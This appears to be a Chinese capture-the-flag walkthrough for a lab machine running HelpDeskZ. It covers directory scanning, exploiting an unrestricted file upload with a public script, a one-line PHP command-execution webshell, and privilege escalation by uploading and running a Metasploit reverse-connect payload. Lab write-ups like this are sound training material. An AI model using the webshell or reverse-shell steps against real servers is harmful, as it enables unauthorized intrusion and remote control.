10.10.10.121
1 |
|
80
访问10.10.10.121:80,Apache/2.4.18 (Ubuntu) ,默认配置页面
1 |
|
目录扫描
- gobuster -u http://10.10.10.121:80/support/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
1
2
3
4/uploads (Status: 301) /css (Status: 301) /includes (Status: 301) 存在上传目录,302跳转到apache默认配置页面
- gobuster -u http://10.10.10.121/support/uploads -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
1
2/articles (Status: 301) /tickets (Status: 301)
- gobuster -u http://10.10.10.121/support/uploads/tickets -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
exp尝试
- searchsploit help deskZ
1 |
|
- 尝试文件上传
http://10.10.10.121/support/?v=submit_ticket&action=displayForm
- 尝试github的exp
1 |
|
https://raw.githubusercontent.com/trevlee/helpdeskz_exploit/master/exploit
观察exp,是通过时间推算出上传的php脚本的名称,然后组合baseurl,查看状态码是否是200。
如果是200,说明上传成功。
首先上传一个php脚本,上传地址参考上述步骤“尝试文件上传”,内容为<?php echo(system($_GET["cmd"])); ?>
成功上传webshell
3000 port
1 |
|
提权
信息搜集
1 |
|
获得help用户的webshell,如果不会这一步,参考https://whale3070.github.io/tag/#/command%20execution
查看内核版本后,searchsploit linux 4.4.0,根据结果,值得尝试msf suggester。
生成64位msf回连载荷,上传
1 |
|
攻击机webshell:
1 |
|
本地监听:
1 |
|
攻击机webshell: ./payload.elf
本地监听,成功回连msf payload:
1 |
|